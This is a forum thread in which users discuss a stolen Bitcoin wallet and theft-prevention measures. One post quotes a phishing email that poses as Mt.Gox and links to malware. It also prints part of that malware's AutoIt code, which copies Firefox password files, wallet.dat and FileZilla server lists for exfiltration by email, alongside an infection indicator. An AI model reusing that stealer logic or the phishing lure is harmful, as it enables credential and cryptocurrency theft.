Pages:
Author

Topic: ALL of my bitcoins stolen (Around 60) . What the F*CK. (Read 16802 times)

legendary
Activity: 1218
Merit: 1000
You didn't fall for this email, did you:

Quote
Dear Mt.Gox user,

As i'm sure most of you are well aware, there has been a serious compromise of Mt. Gox's database.

We implore all of our users to take safety precautions to ensure their assets are not at risk, as your password may have been compromised

Please Follow the instructions here (Instructions are given by text and an image) : http://www.fileden.com/files/2011/6/17/3153783/Mt.Gox-Safety-Tutorials.rar

It is very important that you follow these instructions to prevent any further compromises on other sites that you browse.

Thanks,

The Mt.Gox team

BTW, how can you be confident about viruses, etc, if you have an unencrypted wallet and you lost all your BTC from it. I mean, really, think about it.


Sorry to go a bit offtopic, but the robber who created that virus really went hardcore; full time robber!
Here's what it goes after (it's an AutoIt script compiled and UPX packed):

Code:
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\key3.db", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\signons*", "C:\temp1\signons")
FileCopy(Execute(" @AppDataDir ") & "\bitcoin\" & "wallet.dat", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\filezilla\" & "recentservers.xml", "C:\temp1\")

And sends it to:

[email protected]

EDIT: For those wondering if are infected, look for a folder names "readme" with a file inside named ""READ-FIRST.txt", inside your AppData dir (C:\documents and settings\\Application Data (2k/xp) - c:\users\\AppData\Roaming (Vista/7))
sr. member
Activity: 322
Merit: 252
I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol

Was it 1077? The price of a cheese pizza and large soda?


+1 for the Futurama reference lol
sr. member
Activity: 294
Merit: 250
You can only use a password to protect (= encrypt) the private keys. Once someone has those keys he can do what he wants.
Yes, exactly my point.  It seems the system would be greatly improved if the sender had the ability to "verify" a transaction.  Thus, my money could only be used by me (when I verify it) and then it becomes yours.

Such a system would make the Bitcoin extremely attractive!
That's not technically possible. That is what your private key does - it authorizes a transaction. You can put a transaction password on your client, but that doesn't do anything if someone steals your wallet.dat - because they can just use the wallet.dat in a client that does not have that protection. If you have the private keys, you can spend the bitcoins, and there is to the best of my knowledge no technically possible way to prevent that.
legendary
Activity: 1022
Merit: 1001

Was it 1077? The price of a cheese pizza and large soda?


Yea, which was all fine and dandy until the price of a cheese pizza and soda went up
full member
Activity: 154
Merit: 100
I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol

Was it 1077? The price of a cheese pizza and large soda?
legendary
Activity: 3080
Merit: 1080
Yeah OP, is there anything the patron saint of wallet-fail can do for you?


Would you just kindly FUCK OFF!! I'm tired of you trolling me on every post that I make you ignorant asshole!

sr. member
Activity: 371
Merit: 250
Yes, and in that sense Windows can provide the exact same protection, because even back in XP there was an option to encrypt/shut off your user directory, so that other users (even administrators) couldn't access it.

Is there any third party software that makes use of permissions in Windows like this effectively?  Is there a way to handle this type of usage case, even for versions of Windows without user configurable permissions (i.e. versions below Pro)?
As far as I know, it doesn't actually work, kust makes the stuff impossible to list, but if you know the name of a file, you can get it. That, or my school network does it wrong Smiley
legendary
Activity: 1022
Merit: 1001
I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol

Bizarre!
sr. member
Activity: 322
Merit: 252
I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol
newbie
Activity: 35
Merit: 0
did u have a dropbox account with your wallet stored? if yes, you got the solution
legendary
Activity: 2408
Merit: 1121
Yeah OP, is there anything the patron saint of wallet-fail can do for you?
legendary
Activity: 3080
Merit: 1080
OP did you make any progress?
sr. member
Activity: 308
Merit: 250
Yes, exactly my point.  It seems the system would be greatly improved if the sender had the ability to "verify" a transaction.  Thus, my money could only be used by me (when I verify it) and then it becomes yours.

You verify it with your private key... so don't lose your private key.
sr. member
Activity: 434
Merit: 250
It's what is happening right now... and your password is in the wallet.dat file.  Wink
newbie
Activity: 19
Merit: 0
You can only use a password to protect (= encrypt) the private keys. Once someone has those keys he can do what he wants.
Yes, exactly my point.  It seems the system would be greatly improved if the sender had the ability to "verify" a transaction.  Thus, my money could only be used by me (when I verify it) and then it becomes yours.

Such a system would make the Bitcoin extremely attractive!
sr. member
Activity: 294
Merit: 250
Would it be possible to add an authorization option for sending bitcoin transactions? 

Thus, a transaction will not be verified until you authorize it with your password.

This would pretty much eliminate the benefit of stealing a bitcoin wallet if you don't have the password.  Its kind of weird that there are all of these "verifications" of transactions but the owner doesn't have the option to verify authenticity.
You can only use a password to protect (= encrypt) the private keys. Once someone has those keys he can do what he wants.
newbie
Activity: 19
Merit: 0
Would it be possible to add an authorization option for sending bitcoin transactions? 

Thus, a transaction will not be verified until you authorize it with your password.

This would pretty much eliminate the benefit of stealing a bitcoin wallet if you don't have the password.  Its kind of weird that there are all of these "verifications" of transactions but the owner doesn't have the option to verify authenticity.
sr. member
Activity: 294
Merit: 250
Yes, and in that sense Windows can provide the exact same protection, because even back in XP there was an option to encrypt/shut off your user directory, so that other users (even administrators) couldn't access it.

Is there any third party software that makes use of permissions in Windows like this effectively?  Is there a way to handle this type of usage case, even for versions of Windows without user configurable permissions (i.e. versions below Pro)?
Yes, windows itself. Teach users to log on to that account ONLY if they want to use bitcoin, and make sure the user does not have malware running system-wide (because then the wallet.dat could still be nabbed when logging in to the bitcoin user).

Having software to do this without having to log on to another user would be defeating the purpose - because malware could just emulate and/or control that software.
member
Activity: 111
Merit: 10
Yes, and in that sense Windows can provide the exact same protection, because even back in XP there was an option to encrypt/shut off your user directory, so that other users (even administrators) couldn't access it.

Is there any third party software that makes use of permissions in Windows like this effectively?  Is there a way to handle this type of usage case, even for versions of Windows without user configurable permissions (i.e. versions below Pro)?

TrueCrypt maybe? http://www.truecrypt.org/
legendary
Activity: 1762
Merit: 1011
Yes, and in that sense Windows can provide the exact same protection, because even back in XP there was an option to encrypt/shut off your user directory, so that other users (even administrators) couldn't access it.

Is there any third party software that makes use of permissions in Windows like this effectively?  Is there a way to handle this type of usage case, even for versions of Windows without user configurable permissions (i.e. versions below Pro)?
Pages:
Jump to: